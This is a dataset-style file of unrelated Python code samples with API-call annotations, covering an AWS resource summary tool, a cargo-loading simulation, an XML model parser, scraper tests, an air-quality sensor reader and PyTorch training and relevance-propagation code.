[((84, 115), 'app.app.run', 'app.run', (['HOST', 'PORT'], {'debug': '(True)'}), '(HOST, PORT, debug=True)\n', (91, 115), False, 'from app import app\n')]
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os, sys
from datetime import datetime
from typing import List
import boto3
import botocore.exceptions
from . import register_parser
from .util import ThreadPoolExecutor
from .util.printing import format_table, page_output
def get_stats_for_region(region):
try:
session = boto3.Session(region_name=region)
num_instances = len(list(session.resource("ec2").instances.all()))
num_amis = len(list(session.resource("ec2").images.filter(Owners=["self"])))
num_vpcs = len(list(session.resource("ec2").vpcs.all()))
num_enis = len(list(session.resource("ec2").network_interfaces.all()))
num_volumes = len(list(session.resource("ec2").volumes.all()))
except botocore.exceptions.ClientError:
num_instances, num_amis, num_vpcs, num_enis, num_volumes = ["Access denied"] * 5 # type: ignore
return [region, num_instances, num_amis, num_vpcs, num_enis, num_volumes]
def top(args):
table = [] # type: List[List]
columns = ["Region", "Instances", "AMIs", "VPCs", "Network interfaces", "EBS volumes"]
executor = ThreadPoolExecutor()
table = list(executor.map(get_stats_for_region, boto3.Session().get_available_regions("ec2")))
page_output(format_table(table, column_names=columns, max_col_width=args.max_col_width))
parser = register_parser(top, help='Show an overview of AWS resources per region')
|
[
"boto3.Session"
] |
[((377, 410), 'boto3.Session', 'boto3.Session', ([], {'region_name': 'region'}), '(region_name=region)\n', (390, 410), False, 'import boto3\n'), ((1243, 1258), 'boto3.Session', 'boto3.Session', ([], {}), '()\n', (1256, 1258), False, 'import boto3\n')]
|
from numpy import ndarray
from src.domain.cs_column import Column
import numpy as np
from src.model.stop_at_station_summary import StopAtStationSummary
class CargoSpace(object):
""" Represents cargo space in transport vehicle/ship ect.
"""
def __init__(self, width: int, height: int):
self._width: int = width
self._height: int = height
self._columns: list = [Column(height) for i in range(width)]
@property
def columns(self) -> list:
return self._columns
def simulate_stop_at_station(self, station_index: int, packages_to_load: list) -> StopAtStationSummary:
""" Simulates stop at station, unloads, loads packages and monitors activities.
Args:
station_index: Current station index.
packages_to_load: List of packages to load at this station.
Returns: Summary of process and current state of cargo space.
"""
movements_sum = 0
wait_que = []
packages_per_col = np.zeros(len(self._columns), dtype=int)
# Unload packages for current station.
movements_sum += self._unload_packages(packages_per_col, wait_que, station_index)
# Load packages for current station.
movements_sum += self._load_packages(packages_to_load, packages_per_col)
# Load packages from waiting que.
movements_sum += self._load_packages(wait_que, packages_per_col)
return StopAtStationSummary(
movements_sum=movements_sum,
layout_dist=packages_per_col.tolist(),
weight_dist=[column.sum_weight for column in self._columns]
)
def _unload_packages(self, packages_per_col: ndarray, wait_que: list, station_index: int) -> int:
movement = 0
for index, column in enumerate(self._columns):
ret_que, ret_movements = column.unload_at_station(station_index)
movement += ret_movements
wait_que += ret_que
packages_per_col[index] = column.count()
return movement
def _load_packages(self, packages_to_load: list, packages_per_col: ndarray) -> int:
movements = 0
for package in packages_to_load:
add_index = package.given_col_index
if packages_per_col[add_index] == self._height:
add_index = np.argmin(packages_per_col)
self._columns[add_index].add(package)
packages_per_col[add_index] += 1
movements += 1
return movements
|
[
"src.domain.cs_column.Column",
"numpy.argmin"
] |
[((407, 421), 'src.domain.cs_column.Column', 'Column', (['height'], {}), '(height)\n', (413, 421), False, 'from src.domain.cs_column import Column\n'), ((2339, 2366), 'numpy.argmin', 'np.argmin', (['packages_per_col'], {}), '(packages_per_col)\n', (2348, 2366), True, 'import numpy as np\n')]
|
""" License, Header
"""
from __future__ import absolute_import
from __future__ import print_function
from copy import copy
import xml.etree.ElementTree as xml
from . import modelunit as munit
from . import description
from . import inout
from . import parameterset as pset
from . import checking
from . import algorithm
from . import function
from . import initialization
import os.path
import os
from path import Path
class Parser(object):
""" Read an XML file and transform it in our object model.
"""
def parse(self, crop2ml_dir):
raise Exception('Not Implemented')
def dispatch(self, elt):
return self.__getattribute__(elt.tag)(elt)
class ModelParser(Parser):
""" Read an XML file and transform it in our object model.
"""
def parse(self, crop2ml_dir):
self.models = []
self.crop2ml_dir = crop2ml_dir
xmlrep = Path(os.path.join(self.crop2ml_dir,'crop2ml'))
self.algorep = Path(os.path.join(self.crop2ml_dir,'crop2ml'))
fn = xmlrep.glob('unit*.xml')+xmlrep.glob('function*.xml')+xmlrep.glob('init*.xml')
try:
for f in fn:
# Current proxy node for managing properties
doc = xml.parse(f)
root = doc.getroot()
self.dispatch(root)
except Exception as e:
print(("%s is NOT in CropML Format ! %s" % (f, e)))
return self.models
def dispatch(self, elt):
#try:
return self.__getattribute__(elt.tag)(elt)
#except Exception, e:
# print e
#raise Exception("Unvalid element %s" % elt.tag)
def ModelUnit(self, elts):
""" ModelUnit (Description,Inputs,Outputs,Algorithm,Parametersets,
Testsets)
"""
#print('ModelUnit')
kwds = elts.attrib
self._model = munit.ModelUnit(kwds)
self._model.path = os.path.abspath(self.crop2ml_dir)
self.models.append(self._model)
for elt in list(elts):
self.dispatch(elt)
def Description(self, elts):
""" Description (Title,Author,Institution,Reference,Abstract)
"""
#print('Description')
desc = description.Description()
for elt in list(elts):
self.name = desc.__setattr__(elt.tag, elt.text)
self._model.add_description(desc)
def Inputs(self, elts):
""" Inputs (Input)
"""
#print('Inputs')
for elt in list(elts):
self.dispatch(elt)
def Input(self, elts):
""" Input
"""
#print('Input: ')
properties = elts.attrib
_input = inout.Input(properties)
self._model.inputs.append(_input)
def Outputs(self, elts):
""" Ouputs (Output)
"""
#print('Outputs')
for elt in list(elts):
self.dispatch(elt)
def Output(self, elts):
""" Output
"""
#print('Output: ')
properties = elts.attrib
_output = inout.Output(properties)
self._model.outputs.append(_output)
def Initialization(self, elt):
language=elt.attrib["language"]
name=elt.attrib["name"]
filename=elt.attrib["filename"]
#description =elt.attrib["description"]
code = initialization.Initialization(name,language, filename)
self._model.initialization.append(code)
def Function(self, elt):
language=elt.attrib["language"]
name=elt.attrib["name"]
filename=elt.attrib["filename"]
type=elt.attrib["type"]
description =elt.attrib["description"]
code = function.Function(name, language, filename, type, description)
self._model.function.append(code)
def Algorithm(self, elt):
""" Algorithm
"""
#print('Algorithm')
language=elt.attrib["language"]
platform=elt.attrib["platform"]
if "filename" in elt.attrib:
filename=elt.attrib["filename"]
#file = self.algorep/ os.path.splitext(filename)[1][1:]/filename
file = Path(os.path.join(self.algorep,filename))
with open(file, 'r') as f:
development = f.read()
algo = algorithm.Algorithm(language, development, platform, filename)
else:
development = elt.text
algo = algorithm.Algorithm(language, development, platform)
self._model.algorithms.append(algo)
def Parametersets(self, elts):
""" Parametersets (Parameterset)
"""
#print('Parametersets')
for elt in list(elts):
self.Parameterset(elt)
def Parameterset(self, elts):
""" Parameterset
"""
#print('Parameterset: ')
properties = elts.attrib
name = properties.pop('name')
_parameterset = pset.parameterset(self._model, name, properties)
for elt in list(elts):
self.param(_parameterset, elt)
name = _parameterset.name
self._model.parametersets[name] = _parameterset
def param(self, pset, elt):
""" Param
"""
#print('Param: ', elt.attrib, elt.text)
properties = elt.attrib
name = properties['name']
pset.params[name] = elt.text
def Testsets(self, elts):
""" Testsets (Testset)
"""
#print('Testsets')
for elt in list(elts):
self.Testset(elt)
self.testsets = self._model.testsets
def Testset(self, elts):
""" Testset(Test)
"""
#print('Testset')
properties = elts.attrib
name = properties.pop('name')
#print name
_testset = checking.testset(self._model, name, properties)
for elt in list(elts):
#print elt
testname = elt.attrib['name'] # name of test
#print(testname)
input_test={}
output_test={}
param_test={}
#_test = checking.Test(name)
for j in elt.findall("InputValue"): # all inputs
name = j.attrib["name"]
input_test[name]=j.text
for j in elt.findall("OutputValue"): # all outputs
name = j.attrib["name"]
if len(j.attrib)==2:
output_test[name]=[j.text,j.attrib["precision"]]
else: output_test[name]=[j.text]
param_test = {"inputs":input_test, "outputs":output_test}
_testset.test.append({testname:param_test})
#self._model.testsets.setdefault(name, []).append(_testset)
self._model.testsets.append(_testset)
def model_parser(crop2ml_dir):
""" Parse a set of models as xml files contained in crop2ml directory
and algorithm in src directory
This function returns models as python object.
Returns ModelUnit object of the Crop2ML Model.
"""
parser = ModelParser()
return parser.parse(crop2ml_dir)
|
[
"xml.etree.ElementTree.parse",
"os.path.abspath",
"os.path.join"
] |
[((1958, 1991), 'os.path.abspath', 'os.path.abspath', (['self.crop2ml_dir'], {}), '(self.crop2ml_dir)\n', (1973, 1991), False, 'import os\n'), ((890, 931), 'os.path.join', 'os.path.join', (['self.crop2ml_dir', '"""crop2ml"""'], {}), "(self.crop2ml_dir, 'crop2ml')\n", (902, 931), False, 'import os\n'), ((960, 1001), 'os.path.join', 'os.path.join', (['self.crop2ml_dir', '"""crop2ml"""'], {}), "(self.crop2ml_dir, 'crop2ml')\n", (972, 1001), False, 'import os\n'), ((1232, 1244), 'xml.etree.ElementTree.parse', 'xml.parse', (['f'], {}), '(f)\n', (1241, 1244), True, 'import xml.etree.ElementTree as xml\n'), ((4226, 4262), 'os.path.join', 'os.path.join', (['self.algorep', 'filename'], {}), '(self.algorep, filename)\n', (4238, 4262), False, 'import os\n')]
|
from datetime import date, time
import pytest
import json
from city_scrapers.spiders.chi_water import Chi_waterSpider
test_response = []
with open('tests/files/chi_water_test.json') as f:
test_response.extend(json.loads(f.read()))
spider = Chi_waterSpider()
# This line throws error
parsed_items = [item for item in spider._parse_events(test_response)]
##### Test Single Instance #####
def test_name():
assert parsed_items[0]['name'] == 'Board of Commissioners'
def test_description():
assert parsed_items[0]['event_description'] == 'no agenda posted'
def test_start_time():
assert parsed_items[0]['start'] == {
'date': date(2018, 12, 20),
'time': time(10, 30, 00),
'note': ''
}
def test_id():
assert parsed_items[0]['id'] == 'chi_water/201812201030/x/board_of_commissioners'
def test_location():
assert parsed_items[0]['location'] == {
'address': '100 East Erie Street Chicago, IL 60611',
'name': 'Board Room',
'neighborhood': 'River North'
}
def test_sources():
assert parsed_items[0]['sources'] == [{'note': '',
'url': 'https://mwrd.legistar.com/DepartmentDetail.aspx?ID=1622&GUID=5E16B4CD-0692-4016-959D-3F080D6CFFB4'}]
def test_documents():
assert parsed_items[0]['documents'] == [
{
'url': 'https://mwrd.legistar.com/MeetingDetail.aspx?ID=570944&GUID=DF1E81E4-2660-42AF-A398-8296420B9341&Options=info&Search=',
'note': 'meeting details'
},
]
def test_documents_with_agenda():
assert parsed_items[-2]['documents'] == [
{'url': 'https://mwrd.legistar.com/MeetingDetail.aspx?ID=437015&GUID=639F6AB7-6E76-4429-B6F5-FCEB3DC609C5&Options=info&Search=',
'note': 'meeting details'},
{'url': 'https://mwrd.legistar.com/View.ashx?M=A&ID=437015&GUID=639F6AB7-6E76-4429-B6F5-FCEB3DC609C5',
'note': 'agenda'}
]
@pytest.mark.parametrize('item', parsed_items)
def test_name_not_study_session(item):
assert item['name'] != 'Study Session'
def test_status():
assert parsed_items[-1]['status'] == 'passed'
##### Parameterized Tests #####
@pytest.mark.parametrize('item', parsed_items)
def test_type(item):
assert item['_type'] is 'event'
@pytest.mark.parametrize('item', parsed_items)
def test_all_day(item):
assert item['all_day'] is False
@pytest.mark.parametrize('item', parsed_items)
def test_classification(item):
assert item['classification'] == ''
@pytest.mark.parametrize('item', parsed_items)
def test_end_time(item):
assert item['end'] == {
'date': None,
'time': None,
'note': ''
}
|
[
"pytest.mark.parametrize",
"city_scrapers.spiders.chi_water.Chi_waterSpider",
"datetime.date",
"datetime.time"
] |
[((247, 264), 'city_scrapers.spiders.chi_water.Chi_waterSpider', 'Chi_waterSpider', ([], {}), '()\n', (262, 264), False, 'from city_scrapers.spiders.chi_water import Chi_waterSpider\n'), ((1899, 1944), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (1922, 1944), False, 'import pytest\n'), ((2133, 2178), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (2156, 2178), False, 'import pytest\n'), ((2238, 2283), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (2261, 2283), False, 'import pytest\n'), ((2346, 2391), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (2369, 2391), False, 'import pytest\n'), ((2465, 2510), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""item"""', 'parsed_items'], {}), "('item', parsed_items)\n", (2488, 2510), False, 'import pytest\n'), ((655, 673), 'datetime.date', 'date', (['(2018)', '(12)', '(20)'], {}), '(2018, 12, 20)\n', (659, 673), False, 'from datetime import date, time\n'), ((695, 710), 'datetime.time', 'time', (['(10)', '(30)', '(0)'], {}), '(10, 30, 0)\n', (699, 710), False, 'from datetime import date, time\n')]
|
import gc
import uasyncio as asyncio
import ujson
import utime
from machine import UART, WDT
import ustruct as struct
import logger
from config import read_configuration
c = read_configuration()
wdt = WDT(timeout=600000)
async def start_readings(client):
while True:
logger.log('Initialising UART bus')
uart = UART(1, 9600)
uart.init(9600, bits=8, parity=None, rx=16, timeout=250)
count = 0
while count < 30:
# logger.log('Warming sensor up, reading #%d of 30' % count)
await read_sensor(uart)
count = count + 1
await asyncio.sleep(1)
logger.log('Finished warming up')
data = await read_sensor(uart)
if data is None:
await asyncio.sleep(1)
await read_sensor(uart)
logger.log(data)
logger.log('Turning off UART bus')
uart.deinit()
timestamp = (utime.time() + 946684800) * 1000
data['timestamp'] = timestamp
json = ujson.dumps(data)
await client.publish(c['topic'], json, qos = 1, retain = True)
wdt.feed()
await asyncio.sleep(180)
async def read_sensor(uart):
try:
buffer = []
data = uart.read(32)
if data is None:
logger.log('No data received, re-running')
await asyncio.sleep(1)
return
data = list(data)
gc.collect()
buffer += data
while buffer and buffer[0] != 0x42:
buffer.pop(0)
# Avoid an overrun if all bad data
if len(buffer) > 200:
buffer = []
if len(buffer) < 32:
logger.log('Buffer length > 32, re-running')
await asyncio.sleep(1)
await read_sensor(uart)
if buffer[1] != 0x4d:
logger.log('Second element of buffer was not 0x4d, re-running')
buffer.pop(0)
await asyncio.sleep(1)
await read_sensor(uart)
frame_len = struct.unpack(">H", bytes(buffer[2:4]))[0]
gc.collect()
if frame_len != 28:
buffer = []
logger.log('Frame length was not 28, re-running')
await asyncio.sleep(1)
await read_sensor(uart)
# In order:
# - PM1.0 standard
# - PM2.5 standard
# - PM10 standard
# - PM1.0 environmental
# - PM2.5 environmental
# - PM10 environmental
# - Particles > 0.3m / 0.1L air
# - Particles > 0.5um / 0.1L air
# - Particles > 1.0um / 0.1L air
# - Particles > 2.5um / 0.1L air
# - Particles > 5.0um / 0.1L air
# - Particles > 10um / 0.1L air
# - Skip
# - Checksum
frame = struct.unpack(">HHHHHHHHHHHHHH", bytes(buffer[4:]))
check = sum(buffer[0:30])
if check != frame[-1]:
buffer = []
logger.log('Checksums don\'t match, re-running')
await asyncio.sleep(1)
await read_sensor(uart)
buffer = buffer[32:]
return {
'pm_1_0': frame[3],
'pm_2_5': frame[4],
'pm_10': frame[5],
'particles_0_3um': frame[6],
'particles_0_5um': frame[7],
'particles_1_0um': frame[8],
'particles_2_5um': frame[9],
'particles_5_0um': frame[10],
'particles_10um': frame[11],
}
except Exception as e:
logger.log(e)
|
[
"utime.time",
"logger.log",
"config.read_configuration",
"gc.collect",
"machine.WDT",
"uasyncio.sleep",
"ujson.dumps",
"machine.UART"
] |
[((175, 195), 'config.read_configuration', 'read_configuration', ([], {}), '()\n', (193, 195), False, 'from config import read_configuration\n'), ((203, 222), 'machine.WDT', 'WDT', ([], {'timeout': '(600000)'}), '(timeout=600000)\n', (206, 222), False, 'from machine import UART, WDT\n'), ((282, 317), 'logger.log', 'logger.log', (['"""Initialising UART bus"""'], {}), "('Initialising UART bus')\n", (292, 317), False, 'import logger\n'), ((333, 346), 'machine.UART', 'UART', (['(1)', '(9600)'], {}), '(1, 9600)\n', (337, 346), False, 'from machine import UART, WDT\n'), ((641, 674), 'logger.log', 'logger.log', (['"""Finished warming up"""'], {}), "('Finished warming up')\n", (651, 674), False, 'import logger\n'), ((820, 836), 'logger.log', 'logger.log', (['data'], {}), '(data)\n', (830, 836), False, 'import logger\n'), ((846, 880), 'logger.log', 'logger.log', (['"""Turning off UART bus"""'], {}), "('Turning off UART bus')\n", (856, 880), False, 'import logger\n'), ((1012, 1029), 'ujson.dumps', 'ujson.dumps', (['data'], {}), '(data)\n', (1023, 1029), False, 'import ujson\n'), ((1416, 1428), 'gc.collect', 'gc.collect', ([], {}), '()\n', (1426, 1428), False, 'import gc\n'), ((2057, 2069), 'gc.collect', 'gc.collect', ([], {}), '()\n', (2067, 2069), False, 'import gc\n'), ((1137, 1155), 'uasyncio.sleep', 'asyncio.sleep', (['(180)'], {}), '(180)\n', (1150, 1155), True, 'import uasyncio as asyncio\n'), ((1283, 1325), 'logger.log', 'logger.log', (['"""No data received, re-running"""'], {}), "('No data received, re-running')\n", (1293, 1325), False, 'import logger\n'), ((1664, 1708), 'logger.log', 'logger.log', (['"""Buffer length > 32, re-running"""'], {}), "('Buffer length > 32, re-running')\n", (1674, 1708), False, 'import logger\n'), ((1823, 1886), 'logger.log', 'logger.log', (['"""Second element of buffer was not 0x4d, re-running"""'], {}), "('Second element of buffer was not 0x4d, re-running')\n", (1833, 1886), False, 'import logger\n'), ((2135, 2184), 'logger.log', 'logger.log', (['"""Frame length was not 28, re-running"""'], {}), "('Frame length was not 28, re-running')\n", (2145, 2184), False, 'import logger\n'), ((2919, 2966), 'logger.log', 'logger.log', (['"""Checksums don\'t match, re-running"""'], {}), '("Checksums don\'t match, re-running")\n', (2929, 2966), False, 'import logger\n'), ((3476, 3489), 'logger.log', 'logger.log', (['e'], {}), '(e)\n', (3486, 3489), False, 'import logger\n'), ((615, 631), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (628, 631), True, 'import uasyncio as asyncio\n'), ((758, 774), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (771, 774), True, 'import uasyncio as asyncio\n'), ((925, 937), 'utime.time', 'utime.time', ([], {}), '()\n', (935, 937), False, 'import utime\n'), ((1344, 1360), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (1357, 1360), True, 'import uasyncio as asyncio\n'), ((1727, 1743), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (1740, 1743), True, 'import uasyncio as asyncio\n'), ((1931, 1947), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (1944, 1947), True, 'import uasyncio as asyncio\n'), ((2203, 2219), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (2216, 2219), True, 'import uasyncio as asyncio\n'), ((2986, 3002), 'uasyncio.sleep', 'asyncio.sleep', (['(1)'], {}), '(1)\n', (2999, 3002), True, 'import uasyncio as asyncio\n')]
|
import json
import random
import pysparkling
import torch
from .decoder.utils.instance_scorer import InstanceScorer
from . import show
DATA_FILE = ('outputs/resnet101block5-pif-paf-edge401-190412-151013.pkl'
'.decodertraindata-edge641-samples0.json')
# pylint: skip-file
def plot_training_data(train_data, val_data, entry=0, entryname=None):
train_x, train_y = train_data
val_x, val_y = val_data
with show.canvas() as ax:
ax.hist([xx[entry] for xx in train_x[train_y[:, 0] == 1]],
bins=50, alpha=0.3, density=True, color='navy', label='train true')
ax.hist([xx[entry] for xx in train_x[train_y[:, 0] == 0]],
bins=50, alpha=0.3, density=True, color='orange', label='train false')
ax.hist([xx[entry] for xx in val_x[val_y[:, 0] == 1]],
histtype='step', bins=50, density=True, color='navy', label='val true')
ax.hist([xx[entry] for xx in val_x[val_y[:, 0] == 0]],
histtype='step', bins=50, density=True, color='orange', label='val false')
if entryname:
ax.set_xlabel(entryname)
ax.legend()
def train_val_split_score(data, train_fraction=0.6, balance=True):
xy_list = data.map(lambda d: ([d['score']], [float(d['target'])])).collect()
if balance:
n_true = sum(1 for x, y in xy_list if y[0] == 1.0)
n_false = sum(1 for x, y in xy_list if y[0] == 0.0)
p_true = min(1.0, n_false / n_true)
p_false = min(1.0, n_true / n_false)
xy_list = [(x, y) for x, y in xy_list
if random.random() < (p_true if y[0] == 1.0 else p_false)]
n_train = int(train_fraction * len(xy_list))
return (
(torch.tensor([x for x, _ in xy_list[:n_train]]),
torch.tensor([y for _, y in xy_list[:n_train]])),
(torch.tensor([x for x, _ in xy_list[n_train:]]),
torch.tensor([y for _, y in xy_list[n_train:]])),
)
def train_val_split_keypointscores(data, train_fraction=0.6):
xy_list = (
data
.map(lambda d: ([d['score']] + [xyv[2] for xyv in d['keypoints']] + d['joint_scales'],
[float(d['target'])]))
.collect()
)
n_train = int(train_fraction * len(xy_list))
return (
(torch.tensor([x for x, _ in xy_list[:n_train]]),
torch.tensor([y for _, y in xy_list[:n_train]])),
(torch.tensor([x for x, _ in xy_list[n_train:]]),
torch.tensor([y for _, y in xy_list[n_train:]])),
)
def train_epoch(model, loader, optimizer):
epoch_loss = 0.0
for x, y in loader:
optimizer.zero_grad()
y_hat = model(x)
loss = torch.nn.functional.binary_cross_entropy(y_hat, y)
epoch_loss += float(loss.item())
loss.backward()
optimizer.step()
return epoch_loss / len(loader)
def val_epoch(model, loader):
epoch_loss = 0.0
with torch.no_grad():
for x, y in loader:
y_hat = model(x)
loss = torch.nn.functional.binary_cross_entropy(y_hat, y)
epoch_loss += float(loss.item())
return epoch_loss / len(loader)
def main():
sc = pysparkling.Context()
data = sc.textFile(DATA_FILE).map(json.loads).cache()
train_data_score, val_data_score = train_val_split_score(data)
plot_training_data(train_data_score, val_data_score, entryname='score')
train_data, val_data = train_val_split_keypointscores(data)
model = InstanceScorer()
train_dataset = torch.utils.data.TensorDataset(*train_data)
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=256, shuffle=True)
val_dataset = torch.utils.data.TensorDataset(*val_data)
val_loader = torch.utils.data.DataLoader(val_dataset, batch_size=256, shuffle=False)
optimizer = torch.optim.SGD(model.parameters(), lr=1e-3, momentum=0.9)
for epoch_i in range(100):
train_loss = train_epoch(model, train_loader, optimizer)
val_loss = val_epoch(model, val_loader)
print(epoch_i, train_loss, val_loss)
with torch.no_grad():
post_train_data = (model(train_data[0]), train_data[1])
post_val_data = (model(val_data[0]), val_data[1])
plot_training_data(post_train_data, post_val_data, entryname='optimized score')
torch.save(model, 'instance_scorer.pkl')
if __name__ == '__main__':
main()
|
[
"torch.nn.functional.binary_cross_entropy",
"pysparkling.Context",
"torch.utils.data.DataLoader",
"torch.save",
"random.random",
"torch.utils.data.TensorDataset",
"torch.no_grad",
"torch.tensor"
] |
[((3160, 3181), 'pysparkling.Context', 'pysparkling.Context', ([], {}), '()\n', (3179, 3181), False, 'import pysparkling\n'), ((3500, 3543), 'torch.utils.data.TensorDataset', 'torch.utils.data.TensorDataset', (['*train_data'], {}), '(*train_data)\n', (3530, 3543), False, 'import torch\n'), ((3563, 3635), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['train_dataset'], {'batch_size': '(256)', 'shuffle': '(True)'}), '(train_dataset, batch_size=256, shuffle=True)\n', (3590, 3635), False, 'import torch\n'), ((3655, 3696), 'torch.utils.data.TensorDataset', 'torch.utils.data.TensorDataset', (['*val_data'], {}), '(*val_data)\n', (3685, 3696), False, 'import torch\n'), ((3714, 3785), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['val_dataset'], {'batch_size': '(256)', 'shuffle': '(False)'}), '(val_dataset, batch_size=256, shuffle=False)\n', (3741, 3785), False, 'import torch\n'), ((4288, 4328), 'torch.save', 'torch.save', (['model', '"""instance_scorer.pkl"""'], {}), "(model, 'instance_scorer.pkl')\n", (4298, 4328), False, 'import torch\n'), ((2671, 2721), 'torch.nn.functional.binary_cross_entropy', 'torch.nn.functional.binary_cross_entropy', (['y_hat', 'y'], {}), '(y_hat, y)\n', (2711, 2721), False, 'import torch\n'), ((2911, 2926), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2924, 2926), False, 'import torch\n'), ((4061, 4076), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (4074, 4076), False, 'import torch\n'), ((1716, 1763), 'torch.tensor', 'torch.tensor', (['[x for x, _ in xy_list[:n_train]]'], {}), '([x for x, _ in xy_list[:n_train]])\n', (1728, 1763), False, 'import torch\n'), ((1774, 1821), 'torch.tensor', 'torch.tensor', (['[y for _, y in xy_list[:n_train]]'], {}), '([y for _, y in xy_list[:n_train]])\n', (1786, 1821), False, 'import torch\n'), ((1833, 1880), 'torch.tensor', 'torch.tensor', (['[x for x, _ in xy_list[n_train:]]'], {}), '([x for x, _ in xy_list[n_train:]])\n', (1845, 1880), False, 'import torch\n'), ((1891, 1938), 'torch.tensor', 'torch.tensor', (['[y for _, y in xy_list[n_train:]]'], {}), '([y for _, y in xy_list[n_train:]])\n', (1903, 1938), False, 'import torch\n'), ((2279, 2326), 'torch.tensor', 'torch.tensor', (['[x for x, _ in xy_list[:n_train]]'], {}), '([x for x, _ in xy_list[:n_train]])\n', (2291, 2326), False, 'import torch\n'), ((2337, 2384), 'torch.tensor', 'torch.tensor', (['[y for _, y in xy_list[:n_train]]'], {}), '([y for _, y in xy_list[:n_train]])\n', (2349, 2384), False, 'import torch\n'), ((2396, 2443), 'torch.tensor', 'torch.tensor', (['[x for x, _ in xy_list[n_train:]]'], {}), '([x for x, _ in xy_list[n_train:]])\n', (2408, 2443), False, 'import torch\n'), ((2454, 2501), 'torch.tensor', 'torch.tensor', (['[y for _, y in xy_list[n_train:]]'], {}), '([y for _, y in xy_list[n_train:]])\n', (2466, 2501), False, 'import torch\n'), ((3004, 3054), 'torch.nn.functional.binary_cross_entropy', 'torch.nn.functional.binary_cross_entropy', (['y_hat', 'y'], {}), '(y_hat, y)\n', (3044, 3054), False, 'import torch\n'), ((1587, 1602), 'random.random', 'random.random', ([], {}), '()\n', (1600, 1602), False, 'import random\n')]
|
# trunk-ignore(black-py)
import torch
from torch.nn import Conv1d, Conv2d, Conv3d, MaxPool1d, MaxPool2d, MaxPool3d, Linear, Upsample
from lrp.utils import Flatten
from inverter_util import ( upsample_inverse, max_pool_nd_inverse,
max_pool_nd_fwd_hook, conv_nd_fwd_hook, linear_fwd_hook,
upsample_fwd_hook, silent_pass )
FWD_HOOK = { torch.nn.MaxPool1d : max_pool_nd_fwd_hook,
torch.nn.MaxPool2d : max_pool_nd_fwd_hook,
torch.nn.MaxPool3d : max_pool_nd_fwd_hook,
torch.nn.Conv1d : conv_nd_fwd_hook,
torch.nn.Conv2d : conv_nd_fwd_hook,
torch.nn.Conv3d : conv_nd_fwd_hook,
torch.nn.Linear : linear_fwd_hook,
torch.nn.Upsample : upsample_fwd_hook,
torch.nn.BatchNorm1d : silent_pass,
torch.nn.BatchNorm2d : silent_pass,
torch.nn.BatchNorm3d : silent_pass,
torch.nn.ReLU : silent_pass,
torch.nn.modules.activation.ReLU : silent_pass,
torch.nn.ELU : silent_pass,
Flatten : silent_pass,
torch.nn.Dropout : silent_pass,
torch.nn.Dropout2d : silent_pass,
torch.nn.Dropout3d : silent_pass,
torch.nn.Softmax : silent_pass,
torch.nn.LogSoftmax : silent_pass,
torch.nn.Sigmoid : silent_pass,
torch.nn.SiLU : conv_nd_fwd_hook }
# Rule-independant inversion functions
IDENTITY_MAPPINGS = ( torch.nn.BatchNorm1d,
torch.nn.BatchNorm2d,
torch.nn.BatchNorm3d,
torch.nn.ReLU,
torch.nn.modules.activation.ReLU,
torch.nn.ELU,
Flatten,
torch.nn.Dropout,
torch.nn.Dropout2d,
torch.nn.Dropout3d,
torch.nn.Softmax,
torch.nn.LogSoftmax,
torch.nn.Sigmoid,
torch.nn.SiLU )
def module_tracker(fwd_hook_func):
"""
Wrapper for tracking the layers throughout the forward pass.
Arguments
---------
fwd_hook_func : function
Forward hook function to be wrapped.
Returns
-------
function :
Wrapped hook function
"""
def hook_wrapper(layer, *args):
return fwd_hook_func(layer, *args)
return hook_wrapper
class Inverter(torch.nn.Module):
"""
Class for computing the relevance propagation and supplying the necessary forward hooks for all layers.
Attributes
----------
linear_rule : LinearRule
Propagation rule to use for linear layers
conv_rule : ConvRule
Propagation rule for convolutional layers
pass_not_implemented : bool
Silent pass layers that have no registered forward hooks
device : torch.device
Device to put relevance data
Methods
-------
Propagates incoming relevance for the specified layer, applying any
necessary inversion functions along the way.
"""
# Implemented rules for relevance propagation.
def __init__(self, linear_rule=None, conv_rule=None, pass_not_implemented=False,
device=torch.device('cpu'),):
self.device = device
self.warned_log_softmax = False
self.linear_rule = linear_rule
self.conv_rule = conv_rule
self.fwd_hooks = FWD_HOOK
self.inv_funcs= {}
self.pass_not_implemented = pass_not_implemented
self.module_list = []
def register_fwd_hook(self, module, fwd_hook):
"""
Register forward hook function to module.
"""
if module in self.fwd_hooks.keys():
print('Warning: Replacing previous fwd hook registered for {}'.
format(module))
self.fwd_hooks[module] = fwd_hook
def register_inv_func(self, module, inv_func):
"""
Register inverse function to module.
"""
if module in self.inv_funcs.keys():
print('Warning: Replacing previous inverse registered for {}'.
format(module))
self.inv_funcs[module] = inv_func
def get_layer_fwd_hook(self, layer) :
"""
Interface for getting any layer's forward hook
"""
try :
return self.fwd_hooks[type(layer)]
except :
if self.pass_not_implemented :
return silent_pass
raise \
NotImplementedError('Forward hook for layer type \"{}\" not implemented'.
format(type(layer)))
def invert(self, layer : torch.nn.Module, relevance : torch.Tensor, **kwargs) -> torch.Tensor :
"""
This method computes the backward pass for the incoming relevance
for the specified layer.
Arguments
---------
layer : torch.nn.Module
Layer to propagate relevance through. Can be Conv1d, Conv2d or
any combination thereof in a higher level module.
relevance : torch.Tensor
Incoming relevance from higher up in the network.
Returns
------
torch.Tensor :
